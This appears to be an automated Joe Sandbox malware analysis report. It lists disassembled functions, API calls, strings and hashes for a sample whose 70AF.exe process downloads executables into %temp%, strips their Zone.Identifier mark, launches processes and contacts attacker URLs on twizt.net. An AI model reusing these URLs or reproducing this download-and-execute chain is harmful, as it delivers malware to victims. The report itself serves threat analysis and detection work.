Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: e01f7a56a787f458c0725850010f2c2a2bfa462b0df29791a276f8830bb0cd7c
Instruction ID: 91198217cb426cbe8f6b3e56fc7973d91a8d502262aebdb3f5895dfd858eb58e
Opcode Fuzzy Hash: e01f7a56a787f458c0725850010f2c2a2bfa462b0df29791a276f8830bb0cd7c
Instruction Fuzzy Hash: 1A11C436608B8086D761CB56F84079AB7A5F7CDBD4F54812AEB8D83B69DF38C5548B00

Function 0000000140007DC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000140007DE0
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0000000140007E3B

Strings

bad locale name, xrefs: 0000000140007E16

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 45727ae3dfa649050edbb5c8ae908d021ec93aeeceb008561935d7092012a592
Instruction ID: 6154347e00317c173764be4c62ddc8e77a087d5a0d4402c2b68776a3b9c18c15
Opcode Fuzzy Hash: 45727ae3dfa649050edbb5c8ae908d021ec93aeeceb008561935d7092012a592
Instruction Fuzzy Hash: F5113932215B8486E722DB26F89039AB764FB5C7D4F988125ABCE43B25DB3CE095C741

Function 000000014006ED00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 000000014006ED86

Strings

", xrefs: 000000014006ED5F
exp, xrefs: 000000014006ED75

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: _handle_error
String ID: "$exp
API String ID: 1757819995-2878093337
Opcode ID: 178e7be619177aa12dbb4f0ff757732ec69e214252b9b71bd7424227fe4a6fed
Instruction ID: 6e258172a9af0336703e7bed990c7c344c5eb9249185102ce9a920b034b648c9
Opcode Fuzzy Hash: 178e7be619177aa12dbb4f0ff757732ec69e214252b9b71bd7424227fe4a6fed
Instruction Fuzzy Hash: 46016D3AA24B8887E221CF25A4493AA7AA1FFEA744F241305F7441B674D779D4819B00

Function 0000000140053170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0000000140053183
std::_Lockit::~_Lockit.LIBCPMT ref: 00000001400531DA

Strings

MZx, xrefs: 000000014005318E

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: MZx
API String ID: 593203224-2575928145
Opcode ID: 1b1247199b094979b8f90f4267c72452130af29a778a07a86e380e6c37260e44
Instruction ID: f0725ac41354a5389349270b09ac46a056da36a2d6302c52d3bdcb3e7326935c
Opcode Fuzzy Hash: 1b1247199b094979b8f90f4267c72452130af29a778a07a86e380e6c37260e44
Instruction Fuzzy Hash: 31F02B72323B8441DF41DB12E4997E46390E76CB84F984026E74D073A4EB39C4A5C340

Function 0000000140066BA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000000140066BD1
GetUserDefaultLCID.KERNEL32(?,?,000000A0,000000014006C8D4), ref: 0000000140066BE8

Strings

GetUserDefaultLocaleName, xrefs: 0000000140066BB4, 0000000140066BBE

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: DefaultUsertry_get_function
String ID: GetUserDefaultLocaleName
API String ID: 3217810228-151340334
Opcode ID: da595faaf19191849c900f3eee7bbe942a5f9a5b6f4c6fc9d55cc9996b349b7f
Instruction ID: ec078f3e77b96b4062f3a78e65b207bdff2beaac1384e504ab6ac3d57eb10e09
Opcode Fuzzy Hash: da595faaf19191849c900f3eee7bbe942a5f9a5b6f4c6fc9d55cc9996b349b7f
Instruction Fuzzy Hash: C6F08231318640A1FB165B6BEA81BE82362BB8C7C0F54A036FB0D47B75EE38C595C300

Function 0000000140066C0C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000000140066C3D
InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000000,000000014005CCF4), ref: 0000000140066C57

Strings

InitializeCriticalSectionEx, xrefs: 0000000140066C1E, 0000000140066C31

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 1040353d30f22cb764b263a89e3281f1130f79664ad09dd8a70a4893450849a2
Instruction ID: e62625f07e9c6d0cd163e5aaf00b88e5539f5a842561f3db7803ae2ef30c85d6
Opcode Fuzzy Hash: 1040353d30f22cb764b263a89e3281f1130f79664ad09dd8a70a4893450849a2
Instruction Fuzzy Hash: 76F05E32214B40A1EA169B57E8407D52361F78CBD0F549526FB5E03B64DE38D9A5C740

Function 00000001400657B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00000001400657DD
TlsSetValue.KERNEL32(?,?,00000000,0000000140064002,?,?,?,0000000140063F9D,?,?,?,?,0000000140055F96), ref: 00000001400657F4

Strings

FlsSetValue, xrefs: 00000001400657CA

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 9fe39e1a9233cfe4e06591274b9d174cd0c2252259d30a96eabbf63b9f29695b
Instruction ID: 20dd58d6ddc79366874e9a14fd58f491ac437288524c5324c19e541560368662
Opcode Fuzzy Hash: 9fe39e1a9233cfe4e06591274b9d174cd0c2252259d30a96eabbf63b9f29695b
Instruction Fuzzy Hash: B2E0ED72215640A6EA07AB52F8447D83272BB8C7D1F685126FB59077B5CE38CA99C310

Function 0000000140066AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000000140066AF9
TlsSetValue.KERNEL32(?,?,?,0000000140065E73,?,?,?,000000014005C2B1,?,?,?,?,000000014006560A,?,?,00000000), ref: 0000000140066B10

Strings

FlsSetValue, xrefs: 0000000140066ADD, 0000000140066AE6

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 387fd7e19f5458d915b385fa9d7e160b9c39bb2f91f6df6f712ea8797cf0c7b8
Instruction ID: 7a0b509608b75a1ef32861ca394a7179a93c66b2a15e8d5f0503974fe89a9275
Opcode Fuzzy Hash: 387fd7e19f5458d915b385fa9d7e160b9c39bb2f91f6df6f712ea8797cf0c7b8
Instruction Fuzzy Hash: 46E06D72200A00E1EA0A5B57E8117D96222B78C7C0F58A022FB19073B4DE38CA95C200

Function 0000000140066E14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000000140066E3D
__crtDownlevelLocaleNameToLCID.LIBCPMT ref: 0000000140066E54

Strings

LocaleNameToLCID, xrefs: 0000000140066E20, 0000000140066E2A

Memory Dump Source

Source File: 00000001.00000002.1398456785.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.1398439448.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398512211.0000000140076000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140091000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140094000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398536886.0000000140096000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398593120.0000000140098000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398621254.000000014009F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1398640174.00000001400A2000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_T52Z708x2p.jbxd

Similarity

API ID: DownlevelLocaleName__crttry_get_function
String ID: LocaleNameToLCID
API String ID: 404522899-2050040251
Opcode ID: bd7cbb6fc0c7e6be58ce260b2567fc9e4b4276081783875e5a8d5c11b5bfab7c
Instruction ID: 360f814ce095fdd10dec8cb11847a8d8aaeb26e41ff5f54a905d8eac32db91b8
Opcode Fuzzy Hash: bd7cbb6fc0c7e6be58ce260b2567fc9e4b4276081783875e5a8d5c11b5bfab7c
Instruction Fuzzy Hash: DCE0EDB6214940E1FA1A9B56E8513E522A2ABCC7D4F686422B75E072B5CE39C9958600

Analysis Process: 70AF.exePID: 7504, Parent PID: 7320COMMON

Execution Graph

Execution Coverage:	37.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	94
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00AF1080 Relevance: 59.7, APIs: 28, Strings: 6, Instructions: 187
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00AF1089
srand.MSVCR90 ref: 00AF1090
ExpandEnvironmentStringsW.KERNEL32 ref: 00AF10AF
rand.MSVCR90 ref: 00AF10B5
rand.MSVCR90 ref: 00AF10C9
wsprintfW.USER32 ref: 00AF10F5
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AF1107
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00AF112D
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 00AF1151
InternetReadFile.WININET(00000000,?,00000103,?), ref: 00AF117B
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 00AF11A0
InternetReadFile.WININET(00000000,?,00000103,?), ref: 00AF11B5
CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 00AF11C2
Sleep.KERNELBASE(000003E8,?,?,?,%temp%,?,00000104), ref: 00AF11D3
wsprintfW.USER32 ref: 00AF11E7
DeleteFileW.KERNELBASE(?,?,?,?,?,?,%temp%,?,00000104), ref: 00AF11F4
Sleep.KERNELBASE(000003E8,?,?,?,?,?,%temp%,?,00000104), ref: 00AF11FF
CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 00AF121B
InternetCloseHandle.WININET(00000000), ref: 00AF1222
InternetCloseHandle.WININET(00000000), ref: 00AF122A
Sleep.KERNEL32(000003E8,?,?,%temp%,?,00000104), ref: 00AF123B
rand.MSVCR90 ref: 00AF1248
rand.MSVCR90 ref: 00AF125C
wsprintfW.USER32 ref: 00AF1282
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00AF129A
wsprintfW.USER32 ref: 00AF12B5
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,%temp%,?,00000104), ref: 00AF12C2
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,%temp%,?,00000104), ref: 00AF12CD

Strings

%s:Zone.Identifier, xrefs: 00AF12AF
%s\%d%d.exe, xrefs: 00AF127C
%s\%d%d.exe, xrefs: 00AF10EF
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 00AF1102
%temp%, xrefs: 00AF10A5
%s:Zone.Identifier, xrefs: 00AF11E1

Memory Dump Source

Source File: 00000004.00000002.1497792025.0000000000AF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AF0000, based on PE: true

Associated: 00000004.00000002.1497760109.0000000000AF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1497825469.0000000000AF2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1497858842.0000000000AF4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_70AF.jbxd

Similarity

API ID: File$Internet$CloseHandleSleeprandwsprintf$DeleteOpenRead$CountCreateDownloadEnvironmentExpandStringsTickWritesrand
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
API String ID: 1584605378-1161929716
Opcode ID: aea8112c30b1eaf47ebc318eb71d9f2cc903e08458bc4bac0fd2d4a3e07908f0
Instruction ID: ed59f549800ac3c5b0874fff016502f264b5ff738bf0a1192637204cccb5477d
Opcode Fuzzy Hash: aea8112c30b1eaf47ebc318eb71d9f2cc903e08458bc4bac0fd2d4a3e07908f0
Instruction Fuzzy Hash: 945154B2544344ABE321E7D0DC86FBB77ADABC8701F004929F749961C0DE78AA05C776

Function 00AF12F0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 36
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AF1300
InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 00AF1327
Sleep.KERNELBASE(000003E8), ref: 00AF1334
InternetCloseHandle.WININET(00000000), ref: 00AF1337
Sleep.KERNELBASE(000003E8), ref: 00AF133F
InternetCloseHandle.WININET(00000000), ref: 00AF1342

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 00AF12FB
http://twizt.net/peinstall.php, xrefs: 00AF1321

Memory Dump Source

Source File: 00000004.00000002.1497792025.0000000000AF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AF0000, based on PE: true

Associated: 00000004.00000002.1497760109.0000000000AF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1497825469.0000000000AF2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1497858842.0000000000AF4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_70AF.jbxd

Similarity

API ID: Internet$CloseHandleOpenSleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://twizt.net/peinstall.php
API String ID: 256278798-2653881570
Opcode ID: 21c523047917d87f58546769466f93695c42a40c3c5ddeb9d1723fe09612b778
Instruction ID: da312045dcae2ae5bfd8cdf8f296381e3d10bf0ba9046399c8ba667569aa8371
Opcode Fuzzy Hash: 21c523047917d87f58546769466f93695c42a40c3c5ddeb9d1723fe09612b778
Instruction Fuzzy Hash: F8F0C9327C271877F132A3E5AC86FBE7758DB86F95F200251B7016A1C08E95AD02C66D

Function 00AF1350 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00AF1368
wsprintfW.USER32 ref: 00AF1380
PathFileExistsW.KERNELBASE(00000000), ref: 00AF138D
CreateFileW.KERNELBASE(40000000,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00AF13B4
CloseHandle.KERNELBASE(00000000), ref: 00AF13C0

Strings

%s\33573537.jpg, xrefs: 00AF137A
%temp%, xrefs: 00AF1363

Memory Dump Source

Source File: 00000004.00000002.1497792025.0000000000AF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AF0000, based on PE: true

Associated: 00000004.00000002.1497760109.0000000000AF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1497825469.0000000000AF2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1497858842.0000000000AF4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_70AF.jbxd

Similarity

API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
String ID: %s\33573537.jpg$%temp%
API String ID: 750032643-2829634191
Opcode ID: 728321831738b89dc1e0f6c78b7d9bd8f324d34835f2d9dbc5cc29429b120453
Instruction ID: d30c76c7e451b14c475972c7c5dd150854cea66d66efd6efd81583450d1bd003
Opcode Fuzzy Hash: 728321831738b89dc1e0f6c78b7d9bd8f324d34835f2d9dbc5cc29429b120453
Instruction Fuzzy Hash: 73F0CDF5500304B7E630DBE09C4AFF633686B40704F804E24B765C50E1EBB8998AC765

Function 00AF1000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCR90 ref: 00AF100C
CreateProcessW.KERNELBASE ref: 00AF105C
Sleep.KERNELBASE(000003E8), ref: 00AF106C

Strings

D, xrefs: 00AF104C

Memory Dump Source

Source File: 00000004.00000002.1497792025.0000000000AF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AF0000, based on PE: true

Associated: 00000004.00000002.1497760109.0000000000AF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1497825469.0000000000AF2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1497858842.0000000000AF4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_70AF.jbxd

Similarity

API ID: CreateProcessSleepmemset
String ID: D
API String ID: 4129363112-2746444292
Opcode ID: 31cc4a96f8fa77df30b1297d52c6f626aca12e916e7b24dc85f6573913bcb994
Instruction ID: 8a2c6b5f3616cddf28fb4f80d9f90a270fa9914cc2ccc0df84220947a823e835
Opcode Fuzzy Hash: 31cc4a96f8fa77df30b1297d52c6f626aca12e916e7b24dc85f6573913bcb994
Instruction Fuzzy Hash: DB0131B1A84740ABE310DFA0DD46B5B77E5AB84B00F50491DF349DA2D0EBB59908CB57

Function 00AF13D0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00AF13D5

Part of subcall function 00AF1080: GetTickCount.KERNEL32 ref: 00AF1089
Part of subcall function 00AF1080: srand.MSVCR90 ref: 00AF1090
Part of subcall function 00AF1080: ExpandEnvironmentStringsW.KERNEL32 ref: 00AF10AF
Part of subcall function 00AF1080: rand.MSVCR90 ref: 00AF10B5
Part of subcall function 00AF1080: rand.MSVCR90 ref: 00AF10C9
Part of subcall function 00AF1080: wsprintfW.USER32 ref: 00AF10F5
Part of subcall function 00AF1080: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AF1107
Part of subcall function 00AF1080: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00AF112D
Part of subcall function 00AF1080: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 00AF1151
Part of subcall function 00AF1080: InternetReadFile.WININET(00000000,?,00000103,?), ref: 00AF117B
Part of subcall function 00AF1080: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 00AF11A0
Part of subcall function 00AF1080: InternetReadFile.WININET(00000000,?,00000103,?), ref: 00AF11B5

Part of subcall function 00AF1350: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00AF1368
Part of subcall function 00AF1350: wsprintfW.USER32 ref: 00AF1380
Part of subcall function 00AF1350: PathFileExistsW.KERNELBASE(00000000), ref: 00AF138D

Part of subcall function 00AF12F0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AF1300
Part of subcall function 00AF12F0: InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 00AF1327
Part of subcall function 00AF12F0: Sleep.KERNELBASE(000003E8), ref: 00AF1334
Part of subcall function 00AF12F0: InternetCloseHandle.WININET(00000000), ref: 00AF1337
Part of subcall function 00AF12F0: Sleep.KERNELBASE(000003E8), ref: 00AF133F
Part of subcall function 00AF12F0: InternetCloseHandle.WININET(00000000), ref: 00AF1342

Strings

http://twizt.net/newtpp.exe, xrefs: 00AF13DB

Memory Dump Source

Source File: 00000004.00000002.1497792025.0000000000AF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AF0000, based on PE: true

Associated: 00000004.00000002.1497760109.0000000000AF0000.00000002.00000001.01000000.00000006.sdmpDownload File
